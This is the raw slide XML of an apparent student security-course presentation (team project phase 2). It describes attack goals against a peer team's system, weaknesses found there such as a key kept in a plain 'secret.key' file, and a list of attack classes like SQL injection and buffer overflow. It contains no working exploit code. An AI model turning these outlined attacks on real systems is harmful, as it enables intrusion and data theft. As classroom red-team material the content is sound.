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8" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="297" r:id="rId5"/>
    <p:sldId id="346" r:id="rId6"/>
    <p:sldId id="306" r:id="rId7"/>
    <p:sldId id="334" r:id="rId8"/>
    <p:sldId id="356" r:id="rId9"/>
    <p:sldId id="359" r:id="rId10"/>
    <p:sldId id="298" r:id="rId11"/>
    <p:sldId id="342" r:id="rId12"/>
    <p:sldId id="299" r:id="rId13"/>
    <p:sldId id="361" r:id="rId14"/>
    <p:sldId id="349" r:id="rId15"/>
    <p:sldId id="328" r:id="rId16"/>
    <p:sldId id="300" r:id="rId17"/>
    <p:sldId id="336" r:id="rId18"/>
    <p:sldId id="373" r:id="rId19"/>
    <p:sldId id="374" r:id="rId20"/>
    <p:sldId id="375" r:id="rId21"/>
    <p:sldId id="301" r:id="rId22"/>
    <p:sldId id="357" r:id="rId23"/>
    <p:sldId id="362" r:id="rId24"/>
    <p:sldId id="363" r:id="rId25"/>
    <p:sldId id="364" r:id="rId26"/>
    <p:sldId id="365" r:id="rId27"/>
    <p:sldId id="367" r:id="rId28"/>
    <p:sldId id="302" r:id="rId29"/>
    <p:sldId id="379" r:id="rId30"/>
    <p:sldId id="303" r:id="rId31"/>
    <p:sldId id="324" r:id="rId32"/>
    <p:sldId id="394" r:id="rId33"/>
    <p:sldId id="304" r:id="rId34"/>
    <p:sldId id="332" r:id="rId35"/>
    <p:sldId id="333" r:id="rId36"/>
    <p:sldId id="307" r:id="rId37"/>
    <p:sldId id="322" r:id="rId38"/>
    <p:sldId id="316" r:id="rId39"/>
    <p:sldId id="376" r:id="rId40"/>
    <p:sldId id="380" r:id="rId41"/>
    <p:sldId id="395" r:id="rId42"/>
    <p:sldId id="381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05" r:id="rId53"/>
    <p:sldId id="396" r:id="rId54"/>
    <p:sldId id="392" r:id="rId55"/>
    <p:sldId id="31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000"/>
    <a:srgbClr val="0B1C2B"/>
    <a:srgbClr val="3A0000"/>
    <a:srgbClr val="0F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2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3761A-9D93-4144-A731-A85A3B86A506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7C26-9AAB-4EF5-9C44-A0AA94CD1A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09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5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53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372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372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99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945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4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5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79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1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388B6-3914-42A6-81BD-9E7FB5EABABA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479E3-4689-49AF-A66C-F95359E58A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932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42417" y="1122363"/>
            <a:ext cx="9507166" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CMU Security Specialist Course</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="44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44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20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n-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="36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rPr>
              <a:t>Team Project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phase 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4400">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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834940"/>
            <a:ext cx="9144000" cy="2488211"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg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Six senses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000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3000" dirty="0" smtClean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Team 6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Seongju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Moon (L)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Kyungnam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Bae (E)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Jinmo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Kim (A)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Jeonghwan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ahn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (S)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Byungchul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Park (C)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63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9650" y="1309238"/>
            <a:ext cx="1022913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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compromise Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Obtain user picture and name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compromise Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Pollute user DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compromise Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Make the system not working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132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Severity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12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71466" y="508000"/>
            <a:ext cx="38490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/>
              <a:t>Team 1 system</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17410" name="Picture 2" descr="https://media.discordapp.net/attachments/844851665566826506/860023354571751454/team1_capture.PNG?width=886&amp;height=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346" y="1338997"/>
            <a:ext cx="6377305" cy="453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706880"/>
            <a:ext cx="10858500" cy="4866640"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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High performance (less delay) even in the secure mode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Firewall used so cannot scan ports using ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’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sz="3600" dirty="0" smtClean="0"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sz="3600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sound recovery logic in case of crash or assert</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0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95300" y="481929"/>
            <a:ext cx="8003876" cy="11436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7200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>First Impression</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="72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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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272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Severity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6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23" y="601166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2" descr="Pre-cut Battery Box Door Key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601166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26250" y="3779840"/>
            <a:ext cx="396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그룹 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1061923" y="3779840"/>
            <a:ext cx="3960000" cy="2520000"/>
            <a:chOff x="1061923" y="3779840"/>
            <a:chExt cx="3960000" cy="2520000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 4" descr="Network security in a world of encryption - Information Age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923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19877204">
              <a:off x="2635776" y="4925809"/>
              <a:ext cx="109677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AES</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="32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128</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="320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38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601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v4.7.0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56594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6012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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>v4.7.0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2400" kern="10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cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18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244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65" y="0"/>
            <a:ext cx="1012286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5480" y="4314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Bae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8278" y="2524667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Kim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8729" y="298825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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1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Ahn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1947" y="276045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Park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59178" y="3068131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Mr. Moon</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203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61923" y="601166"/>
            <a:ext cx="9724327" cy="5698674"/>
            <a:chOff x="1061923" y="601166"/>
            <a:chExt cx="9724327" cy="5698674"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="그림 4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923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Picture 2" descr="Pre-cut Battery Box Door Key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6250" y="601166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/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:lum bright="-41000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6826250" y="3779840"/>
              <a:ext cx="3960000" cy="25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8" name="그룹 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1061923" y="3779840"/>
              <a:ext cx="3960000" cy="2520000"/>
              <a:chOff x="1061923" y="3779840"/>
              <a:chExt cx="3960000" cy="2520000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="Picture 4" descr="Network security in a world of encryption - Information Age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1923" y="3779840"/>
                <a:ext cx="3960000" cy="25200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 rot="19877204">
                <a:off x="2635776" y="4925809"/>
                <a:ext cx="1096775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AES</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0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128</a:t>
                </a:r>
                <a:endParaRPr lang="ko-KR" altLang="en-US" sz="320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" name="직사각형 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="601166"/>
            <a:ext cx="5867400" cy="5864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Primitives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and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algorithms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Crypto library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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WolfSSL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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: 4.7.0 (February 15, 2021)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00B0F0"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>known </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>v4.7.0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2400" kern="100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill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Symmetric </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" u="sng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cipher </a:t>
            </a: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algorithm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Algorithm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: AES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size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: 128 bit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Mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>of o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peration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: CBC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Key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>derivation function : 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NONE</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2400" kern="100" dirty="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18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934074" y="601166"/>
            <a:ext cx="6067425" cy="536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Method for hiding secret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No hardware security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(HSM, TEE etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.)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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No code obfuscation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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Just stored in a file, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret.key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”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endParaRPr lang="en-US" altLang="ko-KR" sz="3600" b="1" kern="100" dirty="0" smtClean="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="381000" marR="127000" indent="-2540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b="1" u="sng" kern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Encryption and decryption</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2800" b="1" u="sng" kern="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US" altLang="ko-KR" sz="1100" kern="100" dirty="0" smtClean="0">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data : AI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>classified name and photo</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2400" kern="100">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRP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Use key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retrieved from “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>secret.key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”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16 bytes IV(Initial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Vector) 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are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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46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Resource restriction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2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749844" y="548043"/>
            <a:ext cx="3011170" cy="13188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   Server information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   (IP and port)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pic>
        <p:nvPicPr>
          <p:cNvPr id="23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71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00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666240" y="2219483"/>
            <a:ext cx="3070359" cy="368347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54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14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70899" y="2219483"/>
            <a:ext cx="3070359" cy="368347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13" y="290789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7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2346007"/>
            <a:ext cx="2909138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252" y="2346007"/>
            <a:ext cx="2779653" cy="3008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609002" y="5161280"/>
            <a:ext cx="1292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Client</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8199923" y="5161280"/>
            <a:ext cx="1412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Server</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" b="1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4612640" y="344424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4612640" y="3982720"/>
            <a:ext cx="290361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677292" y="2895600"/>
            <a:ext cx="774308" cy="161544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22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71" y="95838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378000"/>
            <a:ext cx="5760000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424960"/>
            <a:ext cx="5760000" cy="32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60" y="3424960"/>
            <a:ext cx="5760000" cy="32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60" y="378000"/>
            <a:ext cx="57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-15000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497840" y="378000"/>
            <a:ext cx="5760000" cy="32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" y="3424960"/>
            <a:ext cx="5760000" cy="32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60" y="3424960"/>
            <a:ext cx="5760000" cy="32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760" y="378000"/>
            <a:ext cx="5760000" cy="324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0983" y="3792750"/>
            <a:ext cx="279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[SERVER/ACCESS]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30329" y="3795820"/>
            <a:ext cx="1970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[NETWORK]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8079" y="666540"/>
            <a:ext cx="2715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[CLIENT/BINARY]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34225" y="666540"/>
            <a:ext cx="22872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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[SERVERINFO]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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9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9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at Is Static Analysis? Static Code Analysis Overview | Perforc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82" y="3760804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82" y="777278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4695224" y="5699760"/>
            <a:ext cx="85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Static</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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172" name="Picture 4" descr="Fuzz Testing Archives | Beyond Security Blo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20" y="3760804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833915" y="4013200"/>
            <a:ext cx="806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Fuzz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78" y="1505082"/>
            <a:ext cx="144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그림 1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90120" y="777278"/>
            <a:ext cx="4680000" cy="252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05015" y="1505082"/>
            <a:ext cx="1440000" cy="14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360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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Resource restriction</a:t>
            </a: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Lessons learned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0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SQL injection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by-passing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authentication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Buffer overflow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reading or writing beyond legitimate area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Unsigned wraparound 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making use of unsinged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wraparound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Format string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mainly used for leaking data on the stack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Revealed key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decrypting secure data using revealed keys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Sniffing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sniffing packets over the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Spoofing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so-called, man in the middle attack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Brute-force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trying all possible input until success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Craft packet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crafting and sending a customized packet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Tampering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modifying system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components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SQL injection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by-passing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authentication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Buffer overflow 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reading or writing beyond legitimate area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Unsigned wraparound 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making use of unsinged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wraparound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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Format string 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mainly used for leaking data on the stack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Revealed key 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decrypting secure data using revealed keys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Sniffing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sniffing packets over the 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Spoofing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so-called, man in the middle attack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Brute-force 			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trying all possible input until success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Craft packet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crafting and sending a customized packet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Tampering 			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modifying system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components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7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1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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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8F2D1BDA-23B8-4349-8984-BE1B4BD4CD68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5144551" y="108882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214527EA-3F5E-4A77-AA8B-A562C5B0F6C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537609" y="2079730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BD37F2FA-E8CD-47F0-B041-42281CBBD1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960551" y="378530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AFCD2F96-5CAE-4D55-9CC1-0C2A73C51C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321996" y="202584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79C1EAE1-FF6A-457D-B34B-58B6205BD145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6366723" y="326355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3BF1A94-9942-40EE-9FC7-1FC2D6573A24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6935578" y="2251374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290C5C0B-6FF7-47DE-AA13-1D7BA72EEACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8486642" y="1067875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C88302A2-9351-4F02-B76E-00161A78BDBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8685990" y="2029687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AF6CE26B-897D-48B0-B910-084056A7C677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8442877" y="53099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2176C940-B3F5-4781-A426-FE55D18A29BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6417731" y="5488845"/>
            <a:ext cx="1020234" cy="605909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Security Design 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9" name="Google Shape;218;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4482045" y="3997270"/>
            <a:ext cx="1656109" cy="56512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Log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Google Shape;194;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973933" y="6092299"/>
            <a:ext cx="684076" cy="28803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1" name="Google Shape;193;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709710" y="6097835"/>
            <a:ext cx="22179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>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unspecified </a:t>
            </a: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7CE5C7E7-6196-4919-9E26-F786109572D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834773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1413D02F-4376-472C-B5B6-9D3FAE116D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321132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;p55"/>
